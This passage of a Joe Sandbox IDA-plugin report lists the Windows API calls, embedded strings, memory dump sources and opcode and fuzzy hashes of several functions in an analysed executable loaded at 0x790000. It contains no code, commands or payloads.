                                                                                                                                          • Part of subcall function 0079A0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00799EF9,?,?,?,00799D92,?,00000001,00000000,?,?), ref: 0079A0D7
                                                                                                                                          • Part of subcall function 0079A0C3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00799EF9,?,?,?,00799D92,?,00000001,00000000,?,?), ref: 0079A108
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Attributes$H_prologTime
                                                                                                                                        • String ID: :
                                                                                                                                        • API String ID: 1861295151-336475711
                                                                                                                                        • Opcode ID: 54b167e35b7ef38f295ac7622c1a6938e9584d8ec1400d9775a6303603b22255
                                                                                                                                        • Instruction ID: dc65bd37785c5d71910bc0e271fe1707dbffea71eb901114ea2f0f0e8ba7de39
                                                                                                                                        • Opcode Fuzzy Hash: 54b167e35b7ef38f295ac7622c1a6938e9584d8ec1400d9775a6303603b22255
                                                                                                                                        • Instruction Fuzzy Hash: C941B571805658E9EF25EB64EC49EEF777CEF45300F0040A9B64592082DB3C5F85CBA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: UNC$\\?\
                                                                                                                                        • API String ID: 0-253988292
                                                                                                                                        • Opcode ID: 485d6d5f2a1359ccaef04d7741eae75c45e46516eb5a595de1e1d6e5481d8c8a
                                                                                                                                        • Instruction ID: f680a17d940349c41bd630678945164133199d0f215f0f3b5005c16c9df49388
                                                                                                                                        • Opcode Fuzzy Hash: 485d6d5f2a1359ccaef04d7741eae75c45e46516eb5a595de1e1d6e5481d8c8a
                                                                                                                                        • Instruction Fuzzy Hash: 52418F31440259EBDF21EF61FD4AEEE7769EF01390F10452AF85493142E77CEA90CAA0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Shell.Explorer$about:blank
                                                                                                                                        • API String ID: 0-874089819
                                                                                                                                        • Opcode ID: 17b8836e4fe21a3c37801fc3de619c28bd2b26fe39c88ae702ee1fbdaa3bef7a
                                                                                                                                        • Instruction ID: 78f0b7ef079f09491916b3218aa67388dbdb0e36e6832e71da13f22752d0c15c
                                                                                                                                        • Opcode Fuzzy Hash: 17b8836e4fe21a3c37801fc3de619c28bd2b26fe39c88ae702ee1fbdaa3bef7a
                                                                                                                                        • Instruction Fuzzy Hash: 69215EB5310606EFD7549B64C894E27B768BFC6710B14C72EF5058B682CF69EC44CBA2
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079DEB5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0079DED4
                                                                                                                                          • Part of subcall function 0079DEB5: GetProcAddress.KERNEL32(007D1E58,CryptUnprotectMemory), ref: 0079DEE4
                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,0079DF2E), ref: 0079DFB5
                                                                                                                                        Strings
                                                                                                                                        • CryptProtectMemory failed, xrefs: 0079DF75
                                                                                                                                        • CryptUnprotectMemory failed, xrefs: 0079DFAD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CurrentProcess
                                                                                                                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                        • API String ID: 2190909847-396321323
                                                                                                                                        • Opcode ID: ef78923fe5d0a05abbf48e155aec4c7c149d5dba19830e1be057f0722c984e8c
                                                                                                                                        • Instruction ID: b2d9005ff85345f4aea18d6ba9dca77698d17ca51edcaf2491ee6ad91198f18a
                                                                                                                                        • Opcode Fuzzy Hash: ef78923fe5d0a05abbf48e155aec4c7c149d5dba19830e1be057f0722c984e8c
                                                                                                                                        • Instruction Fuzzy Hash: 21115B70309212ABDF219F29EC12F6A339AAF84B10B44812EF816DB182DB6CDC0183D0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0079CED7: GetWindowRect.USER32(?,?), ref: 0079CF0E
                                                                                                                                          • Part of subcall function 0079CED7: GetClientRect.USER32(?,?), ref: 0079CF1A
                                                                                                                                          • Part of subcall function 0079CED7: GetWindowLongW.USER32(?,000000F0), ref: 0079CFBB
                                                                                                                                          • Part of subcall function 0079CED7: GetWindowRect.USER32(?,?), ref: 0079CFE8
                                                                                                                                          • Part of subcall function 0079CED7: GetWindowTextW.USER32(?,?,00000400), ref: 0079D007
                                                                                                                                        • GetDlgItem.USER32(00000000,00003021), ref: 0079132B
                                                                                                                                        • SetWindowTextW.USER32(00000000,007C02E4), ref: 00791341
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Rect$Text$ClientItemLong
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 660763476-4108050209
                                                                                                                                        • Opcode ID: d6241022b6bc3b61c51dbd0a611026de17c8a3858bfd1d3421fc65d1555e3b51
                                                                                                                                        • Instruction ID: 29f0991074eb47e4fc874ae273a6db044d012378a9da1e736d2bdbda038f657d
                                                                                                                                        • Opcode Fuzzy Hash: d6241022b6bc3b61c51dbd0a611026de17c8a3858bfd1d3421fc65d1555e3b51
                                                                                                                                        • Instruction Fuzzy Hash: 5EF031B154024DABDF161F51AC19AA93F69AB04749F88C018FE4954991CB7CC860DB58
                                                                                                                                        APIs
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,0079FD0B,?,?,0079FD80,?,?,?,?,?,0079FD6A), ref: 0079FACD
                                                                                                                                        • GetLastError.KERNEL32(?,?,0079FD80,?,?,?,?,?,0079FD6A), ref: 0079FAD9
                                                                                                                                          • Part of subcall function 00796DD3: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00796DF1
                                                                                                                                        Strings
                                                                                                                                        • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 0079FAE2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                                                        • API String ID: 1091760877-2248577382
                                                                                                                                        • Opcode ID: 87b6be803d33a024d63c2a7b0492d65fcc9e4e15fbda458ae351a1ec853300ee
                                                                                                                                        • Instruction ID: 60a9db770f0b51f11c6ae4b22c8d64e66c19e05c45d9ef676c5ffc2ce38e2b6b
                                                                                                                                        • Opcode Fuzzy Hash: 87b6be803d33a024d63c2a7b0492d65fcc9e4e15fbda458ae351a1ec853300ee
                                                                                                                                        • Instruction Fuzzy Hash: 33D05EB1608431A7DE0137286C0AF6E3A04AF12730F65872DF139A51E5CE2C0C9142D5